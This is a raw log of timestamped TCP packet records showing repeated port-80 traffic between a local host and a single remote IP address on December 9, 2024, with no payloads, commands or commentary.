                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.349862099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.349968910 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.349997997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.350039005 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.350991011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.351058960 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.351372004 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.351511955 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.352054119 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.352092028 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.352441072 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.352601051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.353094101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.353225946 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.353307009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.353351116 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.354226112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.354283094 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.354404926 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.354511023 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.355334044 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.355375051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.355664015 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.355715036 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.356359005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.356400013 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.356658936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.356707096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.357459068 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.357508898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.357928991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.357986927 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.358510017 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.358558893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.358851910 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.358891010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.360003948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.360168934 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.360209942 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.360704899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.361007929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.361684084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.361728907 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.361848116 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.361958027 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.361996889 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.362924099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.363013983 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.363070965 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.363112926 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.364032030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.364073038 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.364339113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.364377975 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.365048885 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.365098000 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.365221024 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.365256071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.366142988 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.366157055 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.366183043 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.366205931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.367247105 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.367302895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.367397070 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.367429018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.368324995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.368381023 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.368623972 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.368662119 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.369365931 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.369467020 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.370013952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.370063066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.370400906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.370479107 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.370515108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.371536970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.371598959 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.372221947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.372281075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.372590065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.372626066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.373249054 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.373303890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.373699903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.373713970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.373738050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.373764038 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.375011921 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.375066042 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.375241995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.375281096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.375828028 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.375884056 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.376390934 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.376435041 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.376971006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.377048016 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.377204895 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.377249002 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.378118992 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.378166914 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.378247023 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.378284931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.379152060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.379196882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.379686117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.379738092 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.380429029 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.380482912 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.380642891 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.380683899 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.381288052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.381347895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.381542921 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.381582975 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.382400990 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.382442951 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.383146048 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.383249998 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.383591890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.383640051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.383877039 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.383963108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.384530067 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.384587049 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.384776115 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.384821892 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.385591984 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.385648012 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.385790110 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.386581898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.386687040 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.386781931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.386951923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.387459993 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.387926102 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.388070107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.388108969 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.388247967 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.388876915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.388984919 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.389190912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.389239073 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.389919996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.389986038 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.389990091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.390019894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.391201019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.391258001 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.391362906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.391602993 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.392108917 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.392121077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.392147064 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.392162085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.393178940 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.393219948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.393924952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.394248009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.394289970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.394290924 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.394324064 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.395324945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.395368099 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.395531893 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.395580053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.396544933 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.396588087 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.396642923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.396677017 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.397517920 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.397557020 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.397629023 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.397738934 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.398602962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.398647070 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.398647070 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.398682117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.399683952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.399727106 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.400465965 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.400510073 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.400742054 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.400753975 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.400779009 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.400800943 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.401988983 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.402028084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.402252913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.402317047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.402956009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.403002977 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.403084040 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.404021978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.404083967 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.539680004 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.539769888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.539884090 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.539987087 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.540194035 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.540249109 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.540307999 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.540537119 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.541256905 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.541318893 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.541603088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.541640997 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.542515039 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.542648077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.542695045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.543545961 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.544073105 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.544568062 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.544580936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.544615030 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.544648886 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.544770956 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.544843912 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.545648098 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.545694113 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.545890093 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.545929909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.546879053 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.546969891 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.547033072 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.547076941 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.547763109 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.547775984 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.547817945 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.548825979 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.548914909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.549381971 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.549426079 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551294088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551306009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551325083 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551328897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551348925 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551357031 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551367044 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.551435947 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.552330971 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.552545071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.552815914 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.553179026 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.553190947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.553236008 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.553282976 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.554454088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.554869890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.554963112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.554999113 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.555327892 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.555340052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.555365086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.555380106 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.556401014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.556502104 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.556685925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.556731939 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.557502985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.557514906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.557539940 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.557549953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.558590889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.558645964 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.559701920 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.559715033 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.559770107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:51.559770107 CET4996980192.168.2.6185.215.113.16
